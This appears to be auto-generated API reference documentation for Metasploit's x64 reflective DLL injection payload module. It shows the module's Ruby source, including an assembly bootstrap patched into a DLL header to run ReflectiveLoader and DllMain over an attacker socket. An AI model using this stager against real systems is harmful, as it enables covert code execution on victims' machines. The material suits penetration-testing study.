Module: Msf::Payload::Windows::ReflectiveDllInject_x64
- Includes:
- Msf::Payload::Windows, ReflectiveDLLLoader
- Defined in:
- lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb
Constant Summary
Constants included from ReflectiveDLLLoader
ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER
Instance Method Summary collapse
- #asm_invoke_dll(opts = {}) ⇒ Object
- #initialize(info = {}) ⇒ Object
- #library_path ⇒ Object
- #stage_payload(opts = {}) ⇒ Object
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from ReflectiveDLLLoader
#load_rdi_dll, #load_rdi_dll_from_data
Instance Method Details
#asm_invoke_dll(opts = {}) ⇒ Object
40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 40 def asm_invoke_dll(opts={}) asm = %Q^ ; prologue db 0x4d, 0x5a ; 'MZ' = "pop r10" push r10 ; back to where we started push rbp ; save rbp mov rbp, rsp ; set up a new stack frame sub rsp, 32 ; allocate some space for calls. and rsp, ~0xF ; Ensure RSP is 16 byte aligned ; GetPC call $+5 ; relative call to get location pop rbx ; pop return value ; Invoke ReflectiveLoader() ; add the offset to ReflectiveLoader() add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)} call rbx ; invoke ReflectiveLoader() ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) ; offset from ReflectiveLoader() to the end of the DLL mov r8, rdi ; r8 contains the socket mov rbx, rax ; save DllMain for another call push 4 ; push up 4, indicate that we have attached pop rdx ; pop 4 into rdx call rbx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) ; push the exitfunk value onto the stack mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]} push 5 ; push 5, indicate that we have detached pop rdx ; pop 5 into rdx call rbx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) ^ end |
#initialize(info = {}) ⇒ Object
18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 18 def initialize(info = {}) super(update_info(info, 'Name' => 'Reflective DLL Injection', 'Description' => 'Inject a DLL via a reflective loader', 'Author' => [ 'sf' ], 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations ], 'Platform' => 'win', 'Arch' => ARCH_X64, 'PayloadCompat' => { 'Convention' => 'sockrdi' }, 'Stage' => { 'Payload' => "" } )) ( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class ) end |
#library_path ⇒ Object
36 37 38 |
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 36 def library_path datastore['DLL'] end |
#stage_payload(opts = {}) ⇒ Object
72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 |
# File 'lib/msf/core/payload/windows/x64/reflective_dll_inject_x64.rb', line 72 def stage_payload(opts = {}) # Exceptions will be thrown by the mixin if there are issues. dll, offset = load_rdi_dll(library_path) asm_opts = { rdi_offset: offset, exitfunk: 'thread' # default to 'thread' for migration } asm = asm_invoke_dll(asm_opts) # generate the bootstrap asm bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry if bootstrap.length > 62 raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... dll[ 0, bootstrap.length ] = bootstrap dll end |